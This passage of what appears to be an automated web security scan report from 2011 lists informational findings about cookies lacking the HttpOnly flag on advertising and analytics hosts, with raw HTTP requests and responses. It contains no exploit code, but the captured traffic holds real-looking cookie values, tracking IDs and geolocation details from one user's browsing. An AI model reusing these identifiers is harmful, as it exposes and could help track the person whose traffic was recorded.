Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; PMAT=3q-k0P8Dtv2EXGCX1i1A78OKit3cfn3wmuA3v835o1Qpm1MfmPT2Wcg; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubtime_28134=TMC; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; pubtime_25281=TMC; KRTBCOOKIE_58=1344-CM-00000001429329761; KRTBCOOKIE_27=1216-uid:4e394114-5150-5bce-73fa-628197421391; KRTBCOOKIE_107=1471-uid:8413bde9-2099-43af-b214-8fee85ef2861; _curtime=1313432705; pubfreq_25281=243-1; pubfreq_28134=243-1; PUBMDCID=1; pubfreq_25281_19972_333766901=661-1; PMDTSHR=cat:; SYNCUPPIX_ON=YES; KTPCACOOKIE=YES; KRTBCOOKIE_148=1699-uid:429524AE883F3F4E0C1F6D2B02EBB920; KRTBCOOKIE_16=226-uid:3574436734868397339; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694.571_1408040699

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 2301
Date: Mon, 15 Aug 2011 18:41:37 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 14-Aug-2012 18:41:36 GMT; path=/
Set-Cookie: _curtime=1313433697; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:51:37 GMT; path=/
Set-Cookie: pubfreq_28134_23480_1567451806=243-1; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:21:37 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 16-Aug-2011 18:41:37 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwi
...[SNIP]...

8.60. http://streamate.doublepimp.com/r.poptracking  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://streamate.doublepimp.com
Path:   /r.poptracking

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r.poptracking?pcid=e0cac655-b276-43e0-a649-96531bf856de&eventid=3&aid=20003&offerid=1363&poolid=116&publisherid=20151&siteid=20151&country=US&qsurl=http%3a%2f%2fwww.xhamstercams.com%2fexports%2fgolive%2f%3fAFNO%3d1-0-624213-344279%26UHNSMTY%3d458%26DF%3d0%26lp%3d3&h=&firstdelivery=False HTTP/1.1
Host: streamate.doublepimp.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 15 Aug 2011 18:55:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
P3P: CP="CAO PSA OUR IND"
Set-Cookie: __rtso=1363|2|8/15/2011 11:56:23 AM|42ca7cce-320c-4d84-a796-45706558fe1d; expires=Wed, 14 Sep 2011 11:55:38 GMT; path=/
Set-Cookie: __rtsv=20003_1363_116_20151_0_0_0_0_59241cb1-5c81-42fc-8bfe-86dce249f60c_50.23.123.106_--_8/15/2011 11:55:38 AM_CPM_1.0000_1.0000_20151; expires=Wed, 14 Sep 2011 11:55:38 GMT; path=/
Set-Cookie: __rtsp=116|2|8/15/2011 11:55:38 AM|False; expires=Wed, 14 Sep 2011 11:55:38 GMT; path=/
Location: http://www.xhamstercams.com/exports/golive/?AFNO=1-0-624213-344279&UHNSMTY=458&DF=0&lp=3
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 217

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.xhamstercams.com/exports/golive/?AFNO=1-0-624213-344279&amp;UHNSMTY=458&amp;DF=0&amp;lp=3">here</a>.</h2>
...[SNIP]...

8.61. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync/img?mt_exid=4&mt_ec=64ws&mt_exuid=CAESEPn5uWsxF0NimWaur9X3LMg&cver=1 HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k4x37jEk4RaM-N8KDx421NWuVh1ZLgoWWQudchlsYe5PcYVx2vbYbMtiPq.n2CeWRJTesz5yQXOzCjMZdwAqFyNnOTDtle2VKarcPdz88rH7iZ4jU385oUFDGoP3B6CEgPfX-otWguyL8aLzO9ioQoQtsmg4qcQcLxvJBuEpl1v7hKW1aowqFQgF7-KMC5K7DYpqQ6eqdslCKCQ6UQp23npKU1ShkeJA0YMpBtua2bVx9N40ht7Hgq2VML1B9jJizHu2FsiDsM3LkpS0axGEVF8VLaQGabLzvynjmtHTihkVMdXx-Q4x95mRrhE4VA-oErYpUO6O1vKfYW.pu.DVo-Czk3DMb4zSHlKxsRX7z--ZgBxywhRwp.PHhx6MFPrtOjuURFhyrJtRNOW.5aKDskuV6ohO58ZliicCAHfdh5DXdqa3OZ1F.9UgE6eGvjfYnAD-I5M924P1kz61RknTiwRKE9uMOryQSvalvqxCLLOnMmnndI-6sIIzjFVsodfUqiBrgyrTSpm4JsM6ic6ZFBjMxbXFYK.W2.lKz.AYe0Df12OrJJlE-k7taCg6sQ7xzi.apVxrQZYQ8E2uaxDjsvmDxAOvla83JBLXcwRIeWo7BpqzXHOQr2E6mzLmYvJnC5E62BTPrGShN73Xe-UQYawjRsteukCzFee0cootJRWBeFNZzqmN0bXcwwmiRIwGr5e7GV4gKUldeRFfHL59FWd0q2zBsMCNmnszuiyP37tJE5W86gx20gqzoXJC-VG.OPL8vKg2KrP9SZEdXba1PBE_&d=;ord=865,485,605,004,109,273?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4e394114-5150-5bce-73fa-628197421391; ts=1313432696; mt_mop=13:1312375063|4:1313433698|10008:1313433698

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f47 32583
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 15 Aug 2011 18:41:44 GMT
Connection: Keep-Alive
Set-Cookie: ts=1313433704; domain=.mathtag.com; path=/; expires=Tue, 14-Aug-2012 18:41:44 GMT
Set-Cookie: mt_mop=4:1313433704|10008:1313433698|13:1312375063; domain=.mathtag.com; path=/; expires=Tue, 14-Aug-2012 18:41:44 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

8.62. http://t.mookie1.com/t/v1/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=217944569&migRandom=684517331&migTagDesc=Cingular&migAtlSA=286369565&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286369565/direct;wi.300;hi.250/01?click=http://clk.specificclick.net/click/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142410;dct=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFW=011Qob4w7106bN5; RMFL=011Qre3qU10DsA; RMFM=011QsyqkU10MEI; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:16 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=211111708350353; path=/; expires=Sat, 08-Sep-12 18:24:16 GMT; domain=.mookie1.com
Set-Cookie: mdata=1|211111708350353|1313102888; path=/; expires=Sat, 08-Sep-12 18:24:16 GMT; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

8.63. http://tags.bluekai.com/site/2736  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2736

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2736 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99JRcc6fbvHWp; bko=KJpEWVjQSnmN2tBAAmPMRJMT653wCDWupQ/9PDys9x==; bkw5=KJpMLV/9QCL1JT9A1TMJy1Myk6zZQjaOW6ZsWuTMozf/R/9AyyvU6UJQjsQs0MY0l/Yv/z+Ttun61vsR8ZRwR3wg9zZLX9P0asXpYviehvqbQACmngzsOGSt/ahboGqCzQW9tmL5kx==; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRx1pdDQUwy9bB9E0; bklc=4e48bee4; bk=BY24Lyv8mq65PvUy; bkc=KJh56nNn96WxO4YlXRpZut/gGrecYRWDPGWziHaWR7w5SD9ax4sdY9COHx+OA9iZE3BkvADBogYy+nBxOs6DYbtWQ1sjMV+rDC6dfLtIlSZcQP9evsTLr9o97U0UkabhmgTAV8uFjsqz9BTEfB6hSzTqhbJ9vb8yAZgwLfIe6oylwGG9yUbaNIFXF8wEWmSXzRMbnGbOpapcB0UoIuNodC3dhxYF3gOe2INO0VS4f6mRIThc0/PJC5+XM+blB1MILYc1KK1s2DPoUbz6pllLqWuSXXqgzqodDbcLXdQZCekFdWwfsN8Emwh03m2Jm8sEFgvk7NLv08ImSIaaKtCvI78YK7Rwy+pF2IBOmhXQByK9NxKa+cSF53cncgljqpfwZaSJqOa/IqyRkFSbpwwsjduFP3w22/l3dqY5qVZ2Fpdd9ZY0ZA6=; bkst=KJykMpNmQpW1CMB6Q7TuDMLpLPgWErpWxXUxuGeD5Zaidw/lLMa0YteQYJyOQzHjVnQaiUQ70IXMw4qY4J0R7o42fUaCFF3XB+LetwIQJlVAx4YoMwbf2hzZSlejpQaSGxyI1613PGOnJOJshjEKBNK54pT54wEGD3AvjaUOrfkO/FxxVbtHSb1GIwB86dkoSzpvmcR3nmoacqJRDUAnxlXIsq16/74qrnXIwM00U+fFIF8lsCgh/UOsQ5yTQx2S/ujnDOO7/ZtNJndjeD6IstIuoVyMi6+RvwC/iFpSpdTeKlz2Rx==; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:53 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 16 Aug 2011 18:45:53 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=CYb209v8mq65PvUy; expires=Sat, 11-Feb-2012 18:45:53 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh561XgHaWDOdeFczXyFputWZv1Zo3aNjEUMacut1pr1RDiDFb/vEDCaA3JsZLqBkmp/MISVPYV5CSAtJ9avpPkzLTqNlF7gPb4lF4zfft7WQHrSXeut7HK9Six0hTwhvE7ez4U8W95vvTTFA+vzNffQZhxdiQ27F4CwzcKsoEZFcRAeeuMYrPDS8f2fj4ZFwjIYwOlvghK84b5c/Dy8fDeNc5IYvx7c55v6kwg6FpP4GL9NgcYJ+tleSDTItycy+07lDzreYFz8nn6F+kr2AzzyopUgkB4ZwjNxFwzhXbWoeZFFH0kIpzDekyKVGDy8fPdScI2iyofU0qNw5kmjvDFT2nwERV8EpBFT1PtpTM64DhbRCFYlmdtTtTgf01lrGYaOTDhtIttYh8q2sSlIEh+ViD0HuekXAhxtFvR8fPwbPINuFFobn4lypRloml2d4AUOt3ZH9==; expires=Sat, 11-Feb-2012 18:45:53 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Tue, 16-Aug-2011 18:45:53 GMT; path=/; domain=.bluekai.com
BK-Server: 24b6
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

8.64. http://tags.bluekai.com/site/2751  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2751

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2751?id=CM-00000001429329761 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99JRcc6fbvHWp; bko=KJpEWVjQSnmN2tBAAmPMRJMT653wCDWupQ/9PDys9x==; bkw5=KJpMLV/9QCL1JT9A1TMJy1Myk6zZQjaOW6ZsWuTMozf/R/9AyyvU6UJQjsQs0MY0l/Yv/z+Ttun61vsR8ZRwR3wg9zZLX9P0asXpYviehvqbQACmngzsOGSt/ahboGqCzQW9tmL5kx==; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRx1pdDQUwy9bB9E0; bklc=4e48bee4; bk=f1FCO9v8mq65PvUy; bkc=KJh56e2n96WxO4Yl8hAN0DkLHHEXz6n9/kU9/psYus0rmytG/9CIY6W/vAAHW/vY35BGZDoHyHHI9eLnH5OsL5OvYOizVqwhJ+U0R2dLL1IJ9ItWyZkbhPz9cwJlHcgeH+4PsO9jPci20Uz2kT/y8TtcGLekYjOjIF5+DUo8E8owTpzcYmGvO8AaFy2aklNHCMeF1hT7atRDfF/8lXnSYwFeCEe7Mjr6n2TWpZiK2fsp1V7msNIHqzgU0OqKAIpeuV7mstX7bnX+CKwmwc+3OXvzBdbCFLKta/bIwJod6AfZov25bKKtyF3782+T6Hb5kqb4kkTLxjMlCdNRIz+q8BRyLwZQ1vd5gNlGzDOdeoF41bq3A56a6isFH3VecFmXXE75BHgDpXYWfG4+fDFgdMgIOUF2AVD=; bkst=KJyPMMNmx6W1CatAQMyJYKoD+Ojgf23fni/v/Qauk/SvXrN4uz5Bu/GzQE1QYL8Yy0lRB2PG2W74gmeg9ASmII4eY78sFTPi6HzlHI0PYTRiQgAbHSZJVRV1zFfzlQdITlnCD0Y4SpBAjTqOph6pDXeDV6FumiKklII7yD2gQsFyTANanSC8W7P3KGbn4M1OgWcN8uc+cy2FftJlgfrhd6tnHAm1DAih51ARGMP1tEaVGo7jK3L8qcKnokyOl99fnibJIA0PR6CLJv5hIhXcypqF; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:26:20 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=BtQwCxv8mq65PvUy; expires=Sat, 11-Feb-2012 18:26:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56nNnyN9DO4epSZp+k2HPH1swY/DmEQPeSyVH5LAVnSQQvwTUOSsGbY9/G3Ypih6fvV3hQTmMVTKvG/FiGJBxLcMF6t5pmTD4mzk8f2xixnQmkBRnqQ9vB4J2u7gjbFivqacIBeBe4Ar056SkmVXzMyc+C1JJrr939m0FGeE7MxIMxnOwTKDZdIdDa/x8qh0ZFL+M/ewUXVNjK78EZodsglc9mNwRoFwtGs0pndRQpclsyIEiC1J5wA4lVhhQF2Lx8ghh74oi+Bz84z22fshDZFwsSyAb46FC0mKhexCplFiq2C+SPEMT5vMFDErjAfbtojdSYAL4MZFCVU+yDFoCUcotaXnzfl5pdpz4/n4bQjVsygHtglSh0hf5tVdI7paBiVyJuwrXWJctrLp4sN4GUqPvITHs2e8Lj6+Sfd47cl/WZk1=; expires=Sat, 11-Feb-2012 18:26:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJykMpNmQpW1CMB6Q7TuDMLpLPgWErpWxXUxuGeD5Zaidw/lL7WERm9/79sOh1yhVnQaiUQ70IXMw4qYFJIR7r42fUaCwFrXB+LetwIQJlVAx4YfMwbg2hzZSlejpQaSGxyI1613PGOnJOJshjEKBkK54pG54wEGD3AvjaUOrfkO/FxxVbtHSb1GIwBh6dkoSzpvmcR3nmoacqJRDUABxlXIsq16/74qrnXIwM00U+fFIF8lsCgh/UOsQ5yTQx2S/ujnDOO7/ZtNJndjeD6IstIuoVyMi6+RvwC/iFpupdTeydy2L9==; expires=Sat, 11-Feb-2012 18:26:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Tue, 16-Aug-2011 18:26:20 GMT; path=/; domain=.bluekai.com
BK-Server: a094
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

8.65. http://txt.go.sohu.com/ip/soip  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://txt.go.sohu.com
Path:   /ip/soip

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ip/soip HTTP/1.1
Host: txt.go.sohu.com
Proxy-Connection: keep-alive
Referer: http://www.sohu.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.21
Date: Mon, 15 Aug 2011 18:24:06 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.8
Cache-Control: max-age=3600
Set-Cookie: uid=wKhpT05JZEZDkw/Hbmg3Ag==; expires=Tue, 14-Aug-12 18:24:06 GMT; domain=ad-plus.cn; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Content-Length: 585

String.prototype.getQueryString=function(v){var reg=new RegExp("(^|&|\\?)" + v + "=([^&]*)(&|$)"), r;if(r=this.match(reg)){return unescape(r[2]);}return null;};var sohu_IP_Loc="unknown",LocUrl=documen
...[SNIP]...

8.66. http://user.lucidmedia.com/clicksense/user  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://user.lucidmedia.com
Path:   /clicksense/user

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/user?p=a371b4911c4e5b09&r=1 HTTP/1.1
Host: user.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=36OwoKhw1oP

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:41:25 GMT
Expires: Mon, 15 Aug 2011 18:41:25 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=36OwoKhw1oP; Domain=.lucidmedia.com; Expires=Tue, 14-Aug-2012 18:41:25 GMT; Path=/
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc2JnRsPTQzMjAw&piggybackCookie=uid:3574436734868397339
Content-Length: 0
Connection: close


8.67. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wls.wireless.att.com
Path:   /dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif?&dcsdat=1313432466426&dcssip=www.wireless.att.com&dcsuri=/cell-phone-service/packages/free-packages.jsp&dcsqry=%3Fsource%3DECWD000000000000O&dcsref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&WT.mc_id=ECWD000000000000O&WT.tz=-5&WT.bh=13&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Free%20Phone%20Deals%20and%20Packages%20-%20Shop%20-%20Wireless%20from%20AT%26T&WT.js=Yes&WT.bs=1163x508&WT.fi=No&WT.vt_sid=123&browserid=A001693504923&sessionid=null&buyflowtype=NEW&wt_aka_georegion=246&wt_aka_country_code=US&wt_aka_region_code=CA&wt_aka_city=SANJOSE&wt_aka_dma=807&wt_aka_pmsa=7400&wt_aka_msa=7362&wt_aka_areacode=408&wt_aka_county=SANTACLARA&wt_aka_fips=06085&wt_aka_lat=37.3353&wt_aka_long=-121.8938&wt_aka_timezone=PST&wt_aka_zip=95101&wt_aka_continent=NA&wt_aka_throughput=vhigh&wt_aka_bw=5000&wt_aka_asnum=36351&wt_aka_location_id=0&wt_DMA_Name=San%20Francisco-San%20Jose%20Area&wtDealerCode=Z0066&wtFSRcodePresent=6.3.0_015A HTTP/1.1
Host: wls.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; bn_u=6923670900791695274; ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMzU5MjYyNDcyMC4zMDE2ODQzMAAAAAAAAAABAAAAAgAAAKpgSU6jYElOAQAAAAEAAACqYElOo2BJTgEAAAACAAAAITUwLjIzLjEyMy4xMDYtMzU5MjYyNDcyMC4zMDE2ODQzMA--; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.1.10.1313431966; TLTHID=334FB54EC76B10C7B47BF82B0BF36CDD; TLTSID=31A640C8C76B10C7A09DCAEB2DFC8A0E; fsr.a=1313432465833; wtAka=y

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 19:00:42 GMT
Accept-Ranges: bytes
ETag: "02926e7ea60c71:c87"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMzU5MjYyNDcyMC4zMDE2ODQzMAAAAAAAAAABAAAAAgAAAJ5iSU6jYElOAQAAAAEAAACeYklOo2BJTgEAAAACAAAAITUwLjIzLjEyMy4xMDYtMzU5MjYyNDcyMC4zMDE2ODQzMA--; path=/; expires=Thu, 12-Aug-2021 18:17:02 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Mon, 15 Aug 2011 18:17:01 GMT
Connection: close

GIF89a.............!.......,...........D..;

8.68. http://www.ask.com/about/help  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/help

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/help HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/legal/ask-site-policies
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU0LVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnRwpcQDkAACJXoqMAAAD5
from-tr: trafrt009iad.io.askjeeves.info
Content-Length: 48733
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:36:56 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
